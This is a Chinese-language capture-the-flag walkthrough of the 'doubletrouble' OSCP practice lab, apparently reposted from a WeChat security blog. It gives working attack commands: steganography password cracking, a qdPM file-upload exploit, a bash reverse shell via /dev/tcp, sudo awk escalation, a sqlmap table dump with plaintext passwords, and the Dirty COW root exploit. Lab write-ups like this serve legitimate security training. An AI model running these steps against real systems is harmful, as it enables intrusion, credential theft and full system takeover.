OSCP 靶场
靶场介绍
doubletrouble |
easy |
qdPM getshell、图片隐写、steghide 使用、stegseek使用&爆破、awk 提权、sql 盲注、命令执行漏洞、脏牛提权 |
信息收集
主机发现
nmap -sn 192.168.56.0/24
端口扫描
端口就开放22、80
指纹信息
searchsploit 搜一下,qdPM9.1 版本存在多个漏洞
这里我们使用https://www.exploit-db.com/exploits/47954 exp,但是需要账户密码,接下来再搜集信息;
目录扫描
dirsearch -u http://192.168.56.105 -e php
目录扫描只发现一个比较有用的信息是一张图片,应该就是主题的。
下载下来使用steghide 隐写工具提取信息,但是存在密码,需要爆破密码先
使用 stegseek 工具进行爆破密码
https://github.com/RickdeJager/StegSeek
爆破成功获取密码后,我们使用密码提取隐写的信息,账户密码到手了。接下来尝试打 exp
爆破成功获取密码后,我们使用密码提取隐写的信息,账户密码到手了。接下来尝试打 exp
权限获取
漏洞描述:qdPM 9.1版本中存在安全漏洞。攻击者可通过上传恶意的.php文件利用该漏洞在服务器上执行任意命令。https://jcyj.chd.edu.cn/2020/0422/c5172a126297/page.htm
https://www.exploit-db.com/exploits/47954
python3 qdPM.9.1.py -url http://192.168.56.105/ -u [email protected] -p otis666
EXP 写入后门文件,接下了写一个小马进去使用蚁剑方便操作
试一下全局找flag 并没有结果,接着来找一下账户密码
find / -name "*flag*"
看了一下系统用户和home 目录只有root 可登录,所以数据库这个密码目前没啥用处,接下来进行提权
权限提升
反弹一个shell 到Kali 方便提权,然后我们使用 python 获取一个交互shell,加配置tab 补全功能。
bash -c 'exec bash -i &>/dev/tcp/192.168.56.101/9090 <&1'
python3 -c "import pty;pty.spawn('/bin/bash')"
export TERM=xterm
Ctrl+z
stty -a
stty raw -echo;fg
sudo -l 查看后,发现可以直接使用sudo 提权,我们可以通过辅助网站可以查看使用命令
https://gtfobins.github.io/gtfobins/awk/#sudo
sudo awk 'BEGIN {system("/bin/sh")}'
python3 -c "import pty;pty.spawn('/bin/bash')"
提权后并没有发现存在flag,但是root目录下存在一个镜像,我们使用python3 开启一个http服务把它下载下来
导入第二个靶场后,只发现一个web 服务存在盲注:
使用sqlmap 跑出账号密码
sqlmap -u http://192.168.56.106/index.php --forms -D doubletrouble -T users --dump
Database: doubletrouble
Table: users
[2 entries]
+----------+----------+
| password | username |
+----------+----------+
| GfsZxc1 | montreux |
| ZubZub99 | clapton |
+----------+----------+
但是这里的账号密码都登录不了。。。尝试登录ssh clapton 账号成功登录
获取一个FLAG
6CEA7A737C7C651F6DA7669109B5FB52
进去之后可以看到登录后存在一个命令执行漏洞:
接下来使用脏牛进行提权
https://github.com/FireFart/dirtycow
gcc -pthread dirty.c -o dirty -lcrypt
./dirty my-new-password
mv /tmp/passwd.bak /etc/passwd
提权后获取flag
End
“点赞、在看与分享都是莫大的支持”
原文始发于微信公众号(贝雷帽SEC):【OSCP】doubletrouble
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论